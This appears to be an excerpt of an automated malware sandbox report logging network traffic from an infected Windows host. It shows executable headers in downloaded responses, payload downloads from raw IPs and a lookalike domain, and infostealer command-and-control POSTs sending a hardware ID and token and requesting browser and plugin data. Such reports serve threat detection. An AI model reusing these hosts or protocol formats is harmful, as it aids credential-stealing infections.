72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:19:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 14:10:20 GMTETag: "11d000-6231a6a5cf580"Accept-Ranges: bytesContent-Length: 1167360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 bc f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 b0 f3 11 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 64 64 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 64 64 04 00 00 40 0d 00 00 66 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:19:08 GMTContent-Type: application/octet-streamContent-Length: 1940480Last-Modified: Fri, 27 Sep 2024 14:11:16 GMTConnection: keep-aliveETag: "66f6bd04-1d9c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 b9 fd 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 cf 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ce 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 75 74 6c 6a 67 7a 64 00 90 1a 00 00 50 32 00 00 82 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 68 74 65 77 6c 61 7a 00 10 00 00 00 e0 4c 00 00 04 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 7a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /file1.exe HTTP/1.1Host: glthub.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/Microsoft-Edge.exe HTTP/1.1Host: eijfrhegrtbrfcd.online
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.17Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="build"default2------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"browsers------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 46 2d 2d 0d 0a Data Ascii: ------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------JKKKJJJKJKFHJJJJECBFContent-Disposition: form-data; name="message"plugins------JKKKJJJKJKFHJJJJECBF--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 2d 2d 0d 0a Data Ascii: ------BAEGCGCGIEGDHIDHJJEHContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------BAEGCGCGIEGDHIDHJJEHContent-Disposition: form-data; name="message"fplugins------BAEGCGCGIEGDHIDHJJEH--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFHost: 185.215.113.17Content-Length: 7015Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
